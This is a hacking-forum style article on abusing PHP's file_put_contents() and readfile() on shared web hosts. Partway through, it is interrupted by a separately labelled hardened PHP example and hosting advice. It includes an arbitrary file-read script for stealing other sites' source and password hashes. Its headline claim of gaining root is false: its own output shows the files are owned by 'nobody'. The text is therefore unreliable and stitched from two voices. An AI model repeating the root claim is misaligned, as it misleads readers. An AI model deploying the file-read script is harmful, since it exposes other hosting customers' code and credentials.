Use the PHP file_put_contents() function to gain root.
This is not a hacking technique as such, but it could help you in some cases.
I suppose many of you know of the PHP function file_put_contents(). You can easily create a file with it. But what probably most of you won't know is that you can also use this function to create PHP scripts that run under the root account of your Apache server.
Let's begin shall we.
We got the following script:
<?php
$filename = "evilscript.php";
$scriptcontent = "<?php
//script code goes here
?>";
file_put_contents($filename, $scriptcontent);
?>
This will create the following script:
<?php
//script code goes here
?>
Because the web server creates this script, it is owned by the web server user, and when we examine the file more closely we'll see the following:
$ ls evilscript.php
-rw-r--r-- 1 nobody nobody xx Jan 1 00:00 evilscript.php
Apache usually runs as the user nobody for the record ;)
Because the script is owned by the web server user, it can edit everything that user can write to. The safe_mode directive in PHP does NOT offer protection against this behavior.
If this script contains code to read, e.g., the session data of another site stored on the same server, then you could read and modify everything! This is surely a risk in a shared hosting setup. You could also turn the script into a shell and get root on the web server.
Another big risk is that you can easily get the source code of scripts stored on the server that aren't yours. Here's an example:
<?php
header('Content-Type: text/plain');
readfile($_GET['file']);
?>
If I specify the file parameter as, for example, admin.php, then I simply get the source of that file. And if it contains, e.g., password hashes or something similar... I don't need to draw a picture, do I ;)
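Both scripts above have the same underlying problem: the web server user writes and reads wherever it likes, and the file name (or $_GET['file']) is never checked. The following is an added example, not code from the article, that confines the file_put_contents() write and the file read to one directory, rejects names that are not a single path component, resolves symlinks with realpath() before trusting the result, and creates the file with permissions that keep other users on a shared host from reading it. The names safe_path, write_script, read_text and DATA_DIR are assumptions chosen for this example.

```php
<?php
// Added example, not part of the original article.
// Assumed layout: DATA_DIR is a per-site directory the web server user may use.
declare(strict_types=1);

const DATA_DIR = __DIR__ . '/data';

/**
 * Resolve $name inside DATA_DIR and reject anything that escapes it.
 * Returns the absolute path, or null if the name is not acceptable.
 */
function safe_path(string $name, bool $mustExist): ?string
{
    // Accept a single path component only: no slashes, no "..", no NUL bytes.
    if ($name === '' || $name === '.' || $name === '..'
        || $name !== basename($name) || str_contains($name, "\0")) {
        return null;
    }
    $base = realpath(DATA_DIR);
    if ($base === false) {
        return null; // data directory missing: refuse rather than guess
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $name;
    if (!$mustExist) {
        return $candidate;
    }
    // realpath() follows symlinks, so a link inside DATA_DIR that points
    // at /etc/passwd or another site's admin.php is caught by the prefix check.
    $resolved = realpath($candidate);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($resolved === false || strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $resolved;
}

/** Write $content to DATA_DIR/$name with owner-only write and no world read. */
function write_script(string $name, string $content): bool
{
    $path = safe_path($name, false);
    if ($path === null || is_link($path)) {
        return false; // never write through a pre-existing symlink
    }
    // LOCK_EX prevents interleaved writes from concurrent requests; the chmod
    // replaces the usual 0644 with 0640 so other local users cannot read it.
    if (file_put_contents($path, $content, LOCK_EX) === false) {
        return false;
    }
    return chmod($path, 0640);
}

/** Read DATA_DIR/$name, or return null if the name is rejected or unreadable. */
function read_text(string $name): ?string
{
    $path = safe_path($name, true);
    if ($path === null || !is_file($path)) {
        return null;
    }
    $data = file_get_contents($path);
    return $data === false ? null : $data;
}

// Constructed usage: only plain names inside DATA_DIR get through.
if (PHP_SAPI === 'cli') {
    @mkdir(DATA_DIR, 0750);
    var_dump(write_script('note.txt', "hello\n"));
    var_dump(read_text('note.txt'));
    var_dump(read_text('../admin.php'));      // rejected by the basename check
    var_dump(read_text('/etc/passwd'));       // rejected by the basename check
}
```

The path check only limits what this one script does; it does not change the fact that the file is still owned by the web server user. On a shared host the real fix is to give each site its own PHP user (for example separate php-fpm pools with their own user and group settings) and to restrict each site with open_basedir, so that one customer's file_put_contents() or readfile() cannot reach another customer's files at all.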
I hope you've learned something of this article and find it useful.
- The_Cell